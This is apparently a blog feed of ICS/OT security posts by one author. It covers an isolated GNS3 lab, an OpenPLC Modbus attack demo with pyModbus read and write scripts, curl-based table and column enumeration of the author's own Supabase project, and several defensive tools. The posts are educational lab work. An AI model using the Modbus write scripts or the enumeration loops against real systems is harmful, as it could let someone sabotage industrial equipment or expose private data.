DEV Community: 404Saint

I Spent Hours Fighting a Silent Subnet Conflict to Build an Isolated ICS Security Lab (And What It Taught Me About the Linux Kernel)

404Saint — Fri, 22 May 2026 17:30:11 +0000

By RUGERO Tesla (@404Saint).

We’ve all been there. You have a free afternoon, a great idea, and a completely false sense of security about how long a deployment is going to take.

My goal for the day was simple: build a pristine, fully isolated Operational Technology (OT) and Industrial Control Systems (ICS) security sandbox on my EndeavourOS host. The blueprint in my head was beautiful: GNS3 holding a central ethernet switch, a Kali Linux VM acting as the auditor node, an OpenPLC instance simulating a programmable logic controller, and a Fuxa container hosting a custom visual HMI dashboard.

Twenty minutes, right?

Fast forward a few hours later, and I was deep in the Linux kernel virtual file system decoding hexadecimal strings over raw TCP socket structures just to figure out why my network interfaces were ghosts.

Here is the story of how a standard homelab setup turned into a masterclass in kernel routing, aggressive firewalls, and micro-container constraints—and how you can avoid the exact traps I fell into.

The Illusion of a Simple Setup

If you’ve ever worked with GNS3, you know it’s an incredible tool for virtualization. But when you mix it with Docker containers, things change. GNS3 strips away the standard Docker network daemon translation layer and binds container interface namespaces directly to its own virtual switch fabric.

I dragged my nodes onto the canvas, wired them to a central switch, and explicitly typed out what I thought was a standard static network map inside the Debian-based containers using a classic 192.168.1.X block:

auto eth0
iface eth0 inet static
    address 192.168.1.30
    netmask 255.255.255.0

I booted the canvas, fired up my Kali VM browser, typed in http://192.168.1.30:8080 to access the OpenPLC web dashboard, and... nothing.

Flat connection refused. The lab was entirely dead on arrival.

The Rabbit Hole: When the Tools Disappear

Naturally, my immediate instinct was to drop into the auxiliary terminal of the running OpenPLC node via GNS3 to check the socket statuses.

Instead of a clean bash prompt, the terminal exploded into control-character distortion. Minimalist container images don’t bundle robust interactive terminal binaries, meaning typing standard strings ended up looking like a scrambled mess: l^H^Hs^H^H.

Fine. Plan B. I dropped into my main host terminal to execute a standard docker exec command to check the listening interfaces inside the container namespace using modern replacements like ss or netstat:

sudo docker exec -it badf2aaf2595 ss -tuln

The container immediately snapped back:
OCI runtime exec failed: exec failed: unable to start container process: exec: "ss": executable file not found in $PATH

Production-grade security containers are stripped down to the bare metal to reduce attack surfaces. High-level user-space diagnostic binaries do not exist.

Going Kernel-Level

This is where the real engineering began. If the userspace utilities are missing, you go directly to the source of truth: the Linux kernel abstractions inside the /proc filesystem. I forced the container to print out its raw, active network sockets straight from the kernel:

sudo docker exec -it badf2aaf2595 cat /proc/net/tcp

The kernel spit back raw hex lines:

sl  local_address rem_address   st tx_queue rx_queue
 0: 00000000:1F90 00000000:0000 0A 00000000:00000000

Let's look at that local address string: 00000000:1F90.

00000000 translates to 0.0.0.0 (listening on all interfaces).
1F90 converted from hexadecimal to decimal is 8080.

The kernel proved that the web panel was listening inside the container namespace! But notice what was completely absent: there was no hex line ending in 01F6 (decimal 502, the standard Modbus TCP protocol socket).

This gave me a major clue: the application container was technically alive, but the Modbus protocol engine hadn't initialized yet because it was waiting for an operator to log into the web GUI and click "Start PLC". But I couldn't reach the GUI.

The Plot Twist: The Ghost in the Network Stack

I tried bridging the GNS3 network directly to my native desktop browser using a Cloud Node to bypass VirtualBox entirely. Still, total radio silence.

I opened a host terminal and typed sudo ip addr show. The moment the output printed, the entire mystery evaporated. I saw my physical network interface:

enp0s20f0u5: inet 192.168.1.100/24 ...

My actual, physical hardware home router was hosting my entire room on the 192.168.1.X block. By choosing that exact same subnet pool inside the virtual GNS3 switch canvas, I had created a catastrophic routing conflict in my host operating system's kernel.

Whenever my computer tried to route a packet to 192.168.1.30, the kernel routing tables panicked. It couldn't distinguish whether the target address belonged down the virtual GNS3 wire or out through my physical ethernet cable into my physical room. To add insult to injury, my host operating system (EndeavourOS) runs an aggressive default firewalld profile that was actively dropping untrusted cross-zone virtual bridge traffic.

The Resolution: Pure Isolation

The solution required an architectural shift. To build a pristine, conflict-free simulation space, you must separate your lab from reality.

I tore down the configuration files and completely re-mapped the virtual layout to a unique, non-overlapping private pool: 10.10.10.0/24.

Kali Auditor VM: 10.10.10.5
OpenPLC Engine: 10.10.10.30
Fuxa HMI Graphics: 10.10.10.40
Simulated Field Devices (VPCS): 10.10.10.101 and 10.10.10.102

I booted the clean topology, launched the native browser inside my Kali Linux node, and navigated to http://10.10.10.30:8080.

The web dashboard loaded instantly. I authenticated, hit the Start PLC compilation engine to trigger the runtime daemon, and dropped back out to my Kali terminal to run a definitive
verification scan:

sudo nmap -p 502,8080 10.10.10.30

The output printed a flawless victory signature:

PORT     STATE SERVICE
502/tcp  open  mbap
8080/tcp open  http-proxy

Port 502 was officially wide open on the wire. The virtual industrial plant was alive, isolated, and completely transparent to my auditor node.

Lessons from the Trenches

What started as a routine lab deployment turned into a critical reminder of how low-level systems interact:

Subnet isolation is non-negotiable: Never let your virtual lab environments mirror your physical host infrastructure.
Know your kernel mappings: When containers are stripped of diagnostic tools, knowing how to parse /proc/net/tcp directly from the kernel space is a superpower.
Beware of double-initialization: In minimal environments, rapid web UI inputs can cause underlying application binaries to spin up duplicate threads, creating internal race conditions over sockets. Slow down and verify via network scans.

Now that the networking foundation is solid, my industrial playground is ready. Next up on the roadmap is configuring custom graphic widgets in Fuxa to map live holding registers, and writing python injection scripts to interface directly with the Modbus coils.

If you want to deploy this exact sandbox for your own research without hitting the same roadblocks, I’ve documented a comprehensive, beginner-friendly UI walkthrough and a deep-dive troubleshooting ledger in the repository below:

👉 GitHub Repository: gns3-ics-security-lab

Have you ever lost an entire afternoon to a silent subnet overlap or a hidden firewall drop zone rule? Let's talk about it in the comments below!

I Wrote 10 Lines of Python and Took Control of a PLC. No Password Required.

404Saint — Mon, 18 May 2026 16:22:10 +0000

By RUGERO Tesla (@404Saint).

Before today, I had never touched industrial security. I just had a PC, some free software, and a curiosity about how critical infrastructure actually works under the hood.

What I found kind of scared me.

Let me set the scene

Power grids. Water treatment plants. Oil pipelines. Manufacturing floors. All of these run on something called an ICS — Industrial Control System. At the heart of most ICS environments is a PLC — a Programmable Logic Controller. It's basically a rugged little computer that controls physical things. Open this valve. Spin this motor. Turn on this pump.

These systems run the world. And a lot of them are shockingly easy to talk to.

I don't mean that in a theoretical way. I mean I literally sat at my Ubuntu machine, ran a Python script, and forced a PLC's output from OFF to ON — from across the network, with zero credentials, in under a minute.

Let me show you exactly how I built the lab that made that possible.

Why ICS Security is Different (and Broken)

In regular IT security, you have layers. Firewalls. Authentication. Encryption. Zero trust. People have been fighting that battle for decades and while it's far from perfect, there's at least a culture of security.

ICS is a different world entirely.

A lot of industrial protocols were designed in the 1970s and 80s. The engineers building them weren't thinking about cyberattacks, they were thinking about reliability. Getting a signal from point A to point B, fast and consistently, on a factory floor.

Modbus is the perfect example. It's one of the oldest and most widely used industrial protocols in the world. It has:

No authentication
No encryption
No authorization

If you can reach a device that speaks Modbus on the network, you can read from it and write to it. Full stop. The protocol doesn't ask who you are.

This isn't a bug. It was a design decision that made sense in 1979 when everything was air-gapped and physically isolated. The problem is that the world changed; OT networks got connected to IT networks, which got connected to the internet, but the protocols stayed the same.

That's the core of why ICS security is broken. And the best way to understand it is to see it yourself.

The Lab I Built for $0

Here's everything I used:

Tool	What it does	Cost
OpenPLC	Simulates a real PLC	Free
FUXA	Basic HMI dashboard	Free
Ignition Maker	Industry-grade SCADA/HMI	Free (Maker license)
pyModbus	Python Modbus client	Free
Wireshark	Packet capture	Free
VirtualBox	VM hypervisor	Free

My Hardware

Host Workstation: Intel i5 PC, 16GB RAM running EndeavourOS (Arch Linux)
Attacker Node: Separate physical Ubuntu machine on the same local subnet

No physical PLCs purchased. No expensive lab kit. Just software and two computers most people already have lying around.

How It's Wired Together

Here's the architecture in plain terms:

[ Attacker Machine — Ubuntu ]
          |
          | Local Network
          |
[ Host Machine — EndeavourOS ]
          |
          ├── OpenPLC (Docker) ── The "PLC"
          │        |
          │        └── FUXA (Docker) ── Basic HMI, reads the PLC
          │
          └── VirtualBox
                   |
                   └── Windows 11 VM ── Ignition ── Industry SCADA, also reads PLC

OpenPLC is our simulated PLC. It runs ladder logic and speaks Modbus/TCP on port 502. FUXA and Ignition are two different HMIs — the operator-facing dashboards that show what the PLC is doing. The attacker machine bypasses all of that entirely.

Stage 1 — Getting the PLC Running

I deployed OpenPLC via Docker, mapping the control interface and web administration ports:

docker run -d --name openplc -p 502:502 -p 8080:8080 wzy318/openplc

Port 8080 is the web interface. Port 502 is Modbus — the one that actually matters.

I loaded a simple ladder logic program, hit Start PLC, and confirmed the status said Running.

Stage 2 — Connecting the HMIs

FUXA

FUXA also runs in Docker. The trick here is that two separate Docker containers cannot talk to each other via 127.0.0.1 natively without sharing a network namespace. I had to find OpenPLC's internal bridge network IP:

docker inspect openplc | grep IPAddress

Returns something like `172.17.0.2`

Then, inside FUXA's connection parameters, I specified: 172.17.0.2:502, type Modbus TCP, and toggled Enable to ON.

Green dot. Connected.

Ignition

Ignition runs on the Windows 11 VM. Because it's isolated inside a hypervisor, I couldn't use 127.0.0.1 — I needed the host machine's actual LAN IP. I extracted it using:

ip addr show | grep "inet " | grep -v 127

Inside the Ignition Gateway web console, I mapped: Config → OPC-UA → Drivers → Create New Device → Modbus TCP Driver. I plugged in the host's LAN IP and port 502.

Status configuration: Connected.

At this point, two completely different HMIs are actively polling the exact same PLC. This reflects a realistic production environment—facilities frequently leverage redundant operator stations to track field equipment.

Stage 3 — The Attack

Here's where it gets uncomfortable.

From my Ubuntu attacker machine — a completely separate physical asset on the subnet — I installed pyModbus:

pip3 install pymodbus

First, I performed low-level reconnaissance to read the PLC's coil registers. Coils are binary outputs representing an ON or OFF state:

from pymodbus.client import ModbusTcpClient

# Connect directly to the PLC bypass target
c = ModbusTcpClient('192.168.1.100', port=502)
c.connect()

# Read the first 8 digital output coils
r = c.read_coils(address=0, count=8)
print('Coils Status:', r.bits)
c.close()

Output:

Coils Status: [False, False, False, False, False, False, False, False]

All off. I can audit the live state of an industrial system with no login, no session token, and no authorization checks.

Then, I executed the injection write command:

from pymodbus.client import ModbusTcpClient

c = ModbusTcpClient('192.168.1.100', port=502)
c.connect()

# Force the first coil to an assertive True state
c.write_coil(address=0, value=True)

# Re-verify live register array status
r = c.read_coils(address=0, count=8)
print('Coils After Manipulation:', r.bits)
c.close()

Output:

Coils After Manipulation: [True, False, False, False, False, False, False, False]

Coil 0 successfully flipped to ON.

In a real industrial facility, that specific register might map directly to a water pump, an oil valve, or a conveyor motor. I just forced it to actuate from a completely unauthorized host on the network — entirely bypassing the monitoring systems.

The scary part? The supervisory dashboards still thought everything was executing under native parameters. Nothing on the operator's display actively flagged that a raw protocol injection had overridden the logical controller.

Stage 4 — Watching It in Wireshark

I initialized Wireshark on the host workstation and isolated the interface traffic with a clean display filter:

tcp.port == 502

Re-running the manipulation script captured the raw, unencrypted execution blocks in real time: Function Code 01 (Read Coils) followed immediately by Function Code 05 (Write Single Coil).

That unencrypted protocol exchange is the exact smoking gun industrial Network Detection and Response (NDR) tools like Claroty or Dragos actively hunt for inside production subnets.

What This Actually Means

This isn't a toy exercise. The exact attack pattern demonstrated here maps directly to the foundational methodologies behind the most legendary industrial cyber weapons in history.

Stuxnet (2010): Did not target or alter the operator visual dashboards initially. Instead, it directly injected malicious payload variations into field PLCs to alter frequency generator drives, while simultaneously playing back cached, completely normal-looking telemetry to the SCADA interface. Operators watched normal screens while physical components were actively driven to catastrophic failure parameters underneath.
Oldsmar Water Treatment Attack (2021): An unauthorized entry manipulated an active HMI console to scale chemical additive targets to dangerous concentrations. While a vigilant operator manually intercepted the modification, the control layers lacked native automated validation structures to stop it.

The underlying reality remains unchanged: the protocol tier treats network accessibility as complete authentication. If you exist on an unsegmented OT network and speak native machine protocol, you are implicitly trusted.

Where to Go From Here

If this sparked your curiosity about infrastructure security, here is a clear path forward to build your skills:

Build this environment: Spin up these containers and see it live. The complete guide and script parameters are completely open-source.
Master the industrial stack: Start with Modbus/TCP, then branch into tougher operational protocols like DNP3 and OPC-UA.
Analyze threat taxonomies: Study the MITRE ATT&CK for ICS matrix to see how adversarial tactics map directly to register manipulation.
Deconstruct industry frameworks: Review compliance goals established by the ISA/IEC 62443 zone protection standard.
Architect network defense: Deploy a simulated network inside GNS3, split your layout into isolated zones, and build a proper firewall barrier to experience how defense actually works.

ICS/OT security remains one of the most critical, high-stakes, and deeply underserved areas in the global security industry. The talent gap is massive, and you don't need a multi-thousand-dollar physical lab to learn the core engineering primitives.

The alarming truth isn't that industrial infrastructure security is impossibly complex to learn. The alarming truth is how simple it is to exploit.

The complete step-by-step setup documentation, structural notes, and attack scripts are completely documented and available at github.com/404saint/ics-ot-homelab

Recon Methodology in Practice: From a Single Credential to Full Schema Reconstruction

404Saint — Sun, 03 May 2026 00:43:26 +0000

By RUGERO Tesla (@404Saint)

The methodology matters more than the target

Most recon write-ups focus on the finding. This one focuses on the process.

The target here is a Supabase project I own. Controlled lab, no real user data. I gave myself only what an attacker would realistically have: the project URL and the anon key sitting in the frontend bundle. No dashboard access. No schema knowledge. No tools beyond curl and a small Python script.

The goal wasn't to find a vulnerability. It was to document what passive enumeration and error-based inference actually look like when you execute them methodically, step by step. The same reasoning drives this walkthrough as drives my ICS/OT reconnaissance work: observe first, infer from behavior, reconstruct what you can't see directly, never touch what you don't have to.

The target is different. The methodology is the same.

Step 0: What you start with

Every Supabase project exposes two things in the frontend by default: the project URL and the anon key. The anon key is a JWT. Before making a single network request, decoding it already tells you something:

{
  "iss": "supabase",
  "ref": "<project-ref>",
  "role": "anon",
  "iat": 1771624280,
  "exp": 2087200280
}

Two observations worth making before you do anything else. The role is anon, which means this key authenticates as the anonymous PostgreSQL role and inherits whatever permissions the developer explicitly granted it. And the expiry is ten years out. If this key appears in a public repository or gets scraped from a frontend bundle, an attacker has a decade of access with no forced rotation.

Passive intelligence gathering before active enumeration. Know what you're working with.

Step 1: Try the obvious path first

The first probe is always the most direct one. PostgREST exposes an OpenAPI endpoint that would hand you the entire schema immediately if it responds:

curl "https://<project>.supabase.co/rest/v1/" \
  -H "apikey: <anon_key>"

Response: {"message":"Invalid API key","hint":"Only the service_role API key can be used for this endpoint."}

Locked. The obvious path is closed.

This is where a lot of recon stops. It shouldn't. A failed probe isn't a dead end, it's information. You now know that schema discovery via OpenAPI requires elevated credentials, which means the developer at least configured that part correctly. It raises the bar from immediate to wordlist-dependent. That's a meaningful distinction, not a wall.

Step 2: Wordlist enumeration and what response codes tell you

With no schema available directly, you fall back to inferring structure through behavior. Common table names, systematic probing, reading the response codes.

for table in users profiles accounts orders assignments messages disputes notifications user_roles; do
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://<project>.supabase.co/rest/v1/$table?select=*" \
    -H "apikey: <anon_key>" \
    -H "Authorization: Bearer <anon_key>")
  echo "$table -> $STATUS"
done

The response codes are the signal:

200 means the table exists, it's accessible, and nothing is blocking you
403 means the table exists but something is blocking you
404 means the table doesn't exist

Results from my project:

profiles       -> 200
user_roles     -> 200
assignments    -> 200
messages       -> 200
disputes       -> 200
notifications  -> 200

Six tables. All accessible. This isn't because I disabled access controls. It's because I never enabled them. That distinction matters and I'll come back to it.

The pattern here is worth internalizing. You're not looking for a vulnerability in the traditional sense. You're observing how the system responds to different inputs and reading what those responses imply about underlying structure. This is the same logic that drives behavioral fingerprinting in MEA: real devices and simulated ones respond differently under observation, and those differences tell you things you couldn't get by asking directly.

Step 3: Schema reconstruction through error-based inference

The OpenAPI spec is locked. But PostgREST's error messages are not, and that asymmetry is exploitable.

POSTing a request that references a nonexistent column returns PGRST204. POSTing with a real column returns something different: a constraint error, a type mismatch, a permission failure. The distinction leaks column existence without requiring any elevated access.

for col in id user_id email nickname university department level banned created_at; do
  RESP=$(curl -s -X POST ".../rest/v1/profiles" \
    -H "apikey: <key>" \
    -H "Content-Type: application/json" \
    -d "{\"$col\": \"probe\"}")
  echo "$col -> $RESP"
done

Confirmed columns in profiles: id, user_id, nickname, university, department, level, created_at, updated_at.

Not found: email, banned.

Full schema reconstruction. No OpenAPI access. No elevated credentials. Just systematic probing and reading what the error responses imply.

This is error-based inference, and it appears across disciplines. In network recon, you read ICMP responses to infer firewall rules. In ICS environments, you observe register behavior to distinguish real devices from simulators. The underlying pattern is always the same: systems communicate their internal state through their responses, even when they're trying not to.

Step 4: Confirming access with a direct read

With table names and column structure mapped, the final step is confirming what's actually readable:

curl ".../rest/v1/assignments?select=*" \
  -H "apikey: <key>" \
  -H "Authorization: Bearer <key>"

Response:

[{
  "id": "0155e342-...",
  "student_id": "74aae5f9-...",
  "title": "design",
  "subject": "chem",
  "deadline": "2026-04-09T06:30:00+00:00",
  "budget": 2500.0,
  "status": "open",
  "sla_tier": "priority",
  "payment_status": "none",
  "escrow_status": "none"
}]

In a production environment with real users that's financial data, user identifiers, status information, all readable by anyone with a frontend key that's exposed by design.

Total time from zero knowledge to reading data: under ten minutes. One credential. A wordlist of ten common table names. Standard curl.

The methodology, extracted

The four-step pattern here generalizes:

Start passive. Decode what you already have before sending a single packet. The JWT alone told me the role, the project reference, and the key lifetime.

Try the direct path first. The OpenAPI endpoint would have given everything immediately. It failed, but the failure was informative. Never skip the obvious probe: if it works you're done early, if it fails you know something.

Infer from behavior when direct access fails. Response codes, error messages, timing differences. Systems leak information about their internal state constantly. Read it systematically.

Reconstruct before you read. Map the structure first, then confirm access. Going straight to data reads without understanding the schema means you'll miss things and make noise you didn't need to make.

This is the same sequence whether the target is a web API, a network perimeter, or an industrial protocol implementation. The tools change. The thinking doesn't.

The Supabase-specific finding

For anyone building on Supabase: Row Level Security is not enabled by default. Every table you create is immediately readable by the anon role through the PostgREST API until you explicitly enable RLS and write policies.

ALTER TABLE profiles ENABLE ROW LEVEL SECURITY;

CREATE POLICY "users can view own profile"
  ON profiles FOR SELECT
  USING (auth.uid() = user_id);

Without this, your anon key lives in your frontend bundle, is always public, and acts as a read key for your entire database. Enable RLS before you write application logic, not after.

Conducted against a project I own. No real user data involved. The record in assignments was seeded during development.

All my projects: github.com/404saint

Built by RUGERO Tesla · GitHub: @404Saint
Offensive security researcher focused on ICS/OT, infrastructure security, and attack surface analysis.

I Built a Tool That Detects SEO Poisoning Across Multiple Search Engines

404Saint — Sat, 02 May 2026 23:58:53 +0000

By RUGERO Tesla (@404Saint).

It started with an article I couldn't stop thinking about

A few months back I read about how attackers were poisoning search results to push malicious software downloads. The attack isn't sophisticated. You register a convincing-looking domain, keyword-stuff it correctly, buy or manipulate your way into the top results, and wait. Someone searches "Siemens TIA Portal V17 download", clicks the third result, and downloads a trojanised installer.

What got me wasn't that it worked. It was how it worked. People trust search results. Not because they've verified them. Just because they're there.

And the thing is, most people only check one search engine.

That thought wouldn't leave me alone. If an attacker has to poison Google AND Bing AND Brave AND DuckDuckGo simultaneously for the same query at comparable rank positions... that's a much harder problem. Cross-referencing results across engines should make poisoned results stick out.

So one slow weekend I started building something. I called it Arkoi.

The question I wanted to answer

Every URL scanner I know of asks: is this URL dangerous?

I wanted to ask something different: given that I searched for X, does this result actually belong here?

That sounds subtle but it changes a lot. A two-year-old domain with a clean URLhaus record can still be a poisoned result if it's ranking #2 on Google for a specific enterprise software query while being completely absent everywhere else. The domain isn't inherently dangerous. It's contextually wrong. That's the signal.

How it actually works

Parsing the query first

Before fetching anything, Arkoi tries to understand what you're actually looking for. It pulls out the vendor, the software name, and the version from raw text.

So "Siemens TIA Portal V17 download" becomes:

vendor  : siemens
version : V17
tokens  : ['siemens', 'tia', 'portal', 'v17']

It also handles product aliases. Search for "autocad" and it maps to Autodesk's vendor profile. "matlab" maps to MathWorks. "pycharm" maps to JetBrains. You don't need to know who makes what.

Fetching six engines at once

All six engines (Google, Bing, Brave, DuckDuckGo, Yahoo, Yandex) get queried in parallel through a self-hosted SearXNG instance. Results come back merged and deduplicated by domain, with each result carrying a record of which engines returned it and at what rank.

async def fetch_all(query: str) -> tuple[list[SearchResult], int]:
    async with aiohttp.ClientSession() as session:
        tasks = [_fetch_engine(session, eng, query) for eng in ENGINES]
        results_per_engine = await asyncio.gather(*tasks)
    responded = sum(1 for r in results_per_engine if r)
    raw = [item for engine_results in results_per_engine for item in engine_results]
    return _merge_results(raw), max(responded, 1)

The number of engines that actually responded matters because it's the denominator for consensus scoring. If only three engines respond, a result appearing on two of them is medium consensus, not low.

Six signal checks per result, all concurrent

Vendor domain verification. Does this domain actually belong to the vendor you searched for? There are four possible outcomes: VENDOR_MATCH (it's them), TRUSTED_PARTNER (it's a safe subdomain or official partner), VENDOR_IMPOSTER (the domain contains the vendor name but isn't theirs, like siemens-downloads.net), and UNRELATED.

The imposter case is the most dangerous one and the easiest to catch.

Cross-engine consensus. What share of responding engines returned this domain? 60% or above is high consensus. Below 33% is low. A result that only shows up on one engine for a well-known software query is already worth questioning.

Rank anomaly. Is an unrelated domain sitting in the top 3? Is the official vendor domain buried past position 5 while other domains outrank it? Either pattern is a flag.

Query-result relevance. Token overlap, keyword stuffing detection, and URL path analysis. If the path contains things like /full-version/, /googledrive/, /crack/, that's a direct signal. Known platforms like YouTube and Reddit are excluded from the stuffing check because their titles naturally repeat search terms and that's just how they work.

URLhaus lookup. Async check against the abuse.ch database. If the domain is a known malware host, that surfaces immediately regardless of everything else.

Domain age. WHOIS with a hard 6-second timeout. The timeout matters because without it, stalled WHOIS connections hold up the entire pipeline. Only domains under 180 days get flagged. Older domains get no age penalty regardless of anything else.

Verdicts, not scores

This is the part I'm most opinionated about. No percentage scores. Four categories with explicit reasons:

Verdict	What it means
`✓ TRUSTED`	Official vendor or trusted partner, consistent across engines
`? UNVERIFIED`	No red flags, but no vendor relationship confirmed either
`⚠ SUSPICIOUS`	Something's off. New domain, rank anomaly, suspicious path
`✗ DECEPTIVE`	Clear indicators of deceptive placement

The UNVERIFIED state was the most important one to get right. An earlier version showed anything without red flags as green. That's not safe, that's just uninspected. "We found nothing wrong" and "this is safe" are different things.

The stuff I got wrong

The first version had numeric percentage scores, SSL certificate issuer checking, and keyword scoring. All three were mistakes.

Percentage scores sounded precise but weren't. Where does 67% come from? Arbitrary thresholds added together. Replacing scores with categorical verdicts plus explicit reasoning is more honest and actually more useful because you can see why something got flagged.

SSL issuer checking was noise. In 2025, penalising a domain for using Let's Encrypt tells you it's cost-conscious, not malicious. Millions of legitimate sites use DV certs. Dropped entirely.

Keyword scoring fired too broadly. "Free download" catches CNET. "Full version" catches vendor trial pages. The signal-to-noise ratio was terrible. Replaced with vendor domain mismatch detection and URL path analysis, which are actually precise.

The biggest practical problem was speed. Everything ran sequentially in the first version. Twelve results times three slow network checks each meant runs taking close to two minutes. Rewriting with asyncio and running all per-result checks concurrently got this to around 9 seconds.

Why SearXNG

Arkoi requires a self-hosted SearXNG instance. That's a real dependency and worth explaining.

Scraping search engines directly is legally grey and technically fragile. Official APIs are rate-limited, paid, and different for every engine. SearXNG handles all of this cleanly. One local endpoint, six engines, no API keys, privacy-preserving by default.

docker run -d -p 8080:8080 searxng/searxng

The downside is that not all SearXNG configs have all engines enabled out of the box. In my testing only 3 of 6 engines consistently responded. The consensus logic adapts to however many engines actually returned results so it degrades gracefully.

Where it still falls short

WHOIS age is less useful than I hoped. Privacy protection and rate limiting mean most domains come back as UNKNOWN rather than an actual age. Age works as a supporting signal when it's available but you can't rely on it.

Yandex skews rank anomaly detection. Yandex's ordering for Western software queries is genuinely different from other engines. A YouTube tutorial ranked #1 by Yandex isn't poisoning, it's just Yandex. The rank anomaly check needs engine-aware weighting to handle this properly.

No vendor match means less precision. If your query doesn't hit any of the 50+ vendor profiles, vendor verification gets skipped and you're left with consensus and anomaly scoring only. Still useful, but clearly a step down.

Try it

git clone https://github.com/404saint/arkoi.git
cd arkoi
python -m venv venv && source venv/bin/activate
pip install -r requirements.txt

# Start SearXNG
docker run -d -p 8080:8080 searxng/searxng

# Run it
python arkoi.py "AutoCAD 2025 download"
python arkoi.py "Wireshark install"
python arkoi.py "Adobe Photoshop free download"

Tagged v0.1.0-alpha. Pre-release, not production ready. Known issues are in the GitHub tracker. The README and CONTRIBUTING docs cover everything you'd need to add a vendor or pick up an open issue.

⭐ GitHub

github.com/404saint/arkoi

If this was useful or interesting, a star helps other people find it. Contributions welcome, especially vendor registry additions and the missing test suite. Open a PR and the CONTRIBUTING guide will walk you through it.

Built by RUGERO Tesla · GitHub: @404Saint

Started as a bored weekend experiment. Turned out to be a more interesting problem than I expected.

Securing the Air-Gap: Building a Hardware-Aware Forensic Suite for ICS/OT

404Saint — Mon, 13 Apr 2026 18:58:04 +0000

By RUGERO Tesla (@404Saint)

The air-gap is a lie

Every ICS engineer will tell you their critical systems are air-gapped. Isolated. Untouchable.

Then you watch someone walk up with a USB drive.

The air-gap was never a technical guarantee. It was a policy. And policies fail the moment someone needs to transfer a firmware update, a vendor installer, or last week's historian backup onto a machine that "can't" touch the internet. Removable media is the bridge that's always there, always trusted, and almost never inspected properly.

Stuxnet didn't compromise Iranian centrifuges through a network intrusion. It rode in on a USB drive. That was 2010. The vector hasn't changed.

Standard antivirus doesn't help much here either. It's built for IT environments. It doesn't know what Modbus looks like, or why a legitimate-looking Siemens installer with suspiciously high entropy should be treated differently than a clean one. It scans for known signatures and moves on. In ICS/OT, what you're looking for is often subtler than that.

So I built something for this specific problem. I called it Guardian-OT.

What it actually does

Guardian-OT is a forensic audit tool for removable media before it touches a critical engineering workstation. Not a full-blown enterprise platform. A focused, high-signal tool that tells you what's actually on a drive and whether it matches what's supposed to be there.

It runs four checks, and each one is doing something different.

Hardware fingerprinting

The first thing Guardian-OT does is ignore the filesystem entirely and go straight to the hardware. It extracts the USB hardware UUID and checks it against a local SQLite vault of known, approved devices.

This matters because USB spoofing is real. You can make a drive present itself as something it isn't at the filesystem level. Hardware UUID is harder to fake. If the ID is unknown, or if it doesn't match what the vault expects for that device, the audit flags it before a single file gets scanned.

Recursive integrity verification

Every file on an approved drive gets tree-hashed and stored during the first "known-good" scan. Every subsequent scan compares against that baseline.

If anything has changed since the last clean scan, even one file, it triggers a full deep audit. Not a warning. A full forensic pipeline. The assumption is that in an ICS environment, unexpected changes to a trusted drive are not a routine event.

The forensic pipeline itself

Three things run here in sequence.

YARA scanning hunts for ICS-specific strings — Modbus, S7Comm, Ethernet/IP function codes, things that have no business being in a standard office document or a routine software update. If those strings show up somewhere unexpected, that's worth knowing about.

Entropy analysis scores every file between 0.0 and 8.0. Anything above 7.8 gets isolated for manual review. Encrypted payloads and packed executables both score high. So does compressed data. The score alone doesn't condemn a file but it tells you where to look first when you only have time to look at ten things out of a thousand.

Magic number validation checks whether a file's actual header matches its extension. Hiding a script inside a file renamed to look like a PDF is a trivially simple technique that still works surprisingly often. This catches it.

The researcher dashboard

Raw JSON forensic output is useful for pipelines. It's not useful for a human who needs to triage a drive in the field.

I added a Streamlit dashboard that takes that output and turns it into something you can actually act on. The goal is fast separation: out of 1,000+ assets on a typical drive, you want to get to the 10-20 things that actually need eyes-on review without wading through everything else manually.

Why I'm building this

I'm four to six years into a long-term roadmap toward becoming a full-time ICS/OT security researcher. For most of that time I've been learning how to use tools other people built. Guardian-OT is the point where I started building my own.

That shift matters to me. Understanding how a forensic tool works at the implementation level is different from knowing how to run it. You find the edge cases. You understand why certain signals are meaningful and others aren't. You build intuition that doesn't come from reading documentation.

Guardian-OT is the first step in a forensic workflow I want to make resilient and reproducible for industrial environments. There's more coming.

github.com/404saint/guardian-ot

If you work in OT security or you're on a similar path, I'd like to hear what you think. Issues and PRs are open.

Built by RUGERO Tesla · GitHub: @404Saint

SurfaceLens V2: Infrastructure Attack Surface and Shadow IT Intelligence Engine

404Saint — Sat, 11 Apr 2026 14:07:49 +0000

By RUGERO Tesla (@404Saint)

The thing nobody wants to admit

Most organizations don't actually know what they're exposing to the internet.

I don't mean that as a criticism. I mean it literally. Assets drift. Services get spun up and forgotten. Teams build things outside the controlled network boundary because it's faster. A subdomain that pointed somewhere important three years ago still resolves, except now it points at nothing, and nothing is claimable by anyone with the right timing.

This is what Shadow IT looks like from the outside. Not malicious. Just invisible.

I spent a lot of time doing recon simulations and building lab environments around infrastructure security, and the same problem kept showing up. Discovery is a solved problem. You can find assets. What's hard is understanding how they relate to each other, which ones actually belong to the organization you're looking at, and which ones represent real exposure versus expected noise.

SurfaceLens V2 is my attempt to build something that treats those questions seriously.

What it is

SurfaceLens V2 is a modular attack surface management tool, but calling it a scanner misses the point. It's built as an intelligence pipeline. The difference matters.

A scanner gives you a list. A pipeline takes that list and asks what it means. Who does this asset belong to? Has it appeared before? Does its TLS configuration match what you'd expect? Is this subdomain pointing at infrastructure that's been decommissioned?

The goal is moving from raw discovery to something you can actually act on.

What I kept running into

Doing recon across different lab environments and simulated enterprise networks, four things came up constantly.

Subdomains pointing at decommissioned infrastructure nobody had cleaned up. In some cases the underlying cloud resource was unclaimed, meaning anyone could register it and inherit whatever trust the subdomain carried. Subdomain takeover is well documented but it's still everywhere.

Services exposed outside their intended boundaries. RDP and SSH sitting on public IPs. Databases reachable without a VPN. Not because anyone decided that was fine, just because nobody noticed.

Assets that clearly belonged to an organization but didn't match its DNS patterns at all. Shadow IT, basically. Someone built something, it works, it lives outside the perimeter anyone is actually monitoring.

TLS configurations that ranged from outdated to outright broken, on infrastructure that looked authoritative enough that a user would trust it without thinking.

None of these are surprising individually. Together they paint a picture of an attack surface nobody has a complete map of.

How SurfaceLens approaches it

Pull from multiple sources

The first stage aggregates asset data from Shodan, Censys, LeakIX, CriminalIP, and local datasets. Using multiple providers matters because each one sees different things. An asset invisible to Shodan might be indexed by Censys. Combining sources gives you a more complete picture than any single feed.

Track state over time

One of the decisions I spent the most time on was persistence. Most recon tools treat each scan as a standalone event. You run it, you get results, you move on.

That model throws away something valuable. The question isn't just what's exposed right now. It's what's new since the last time you looked, what disappeared, what changed.

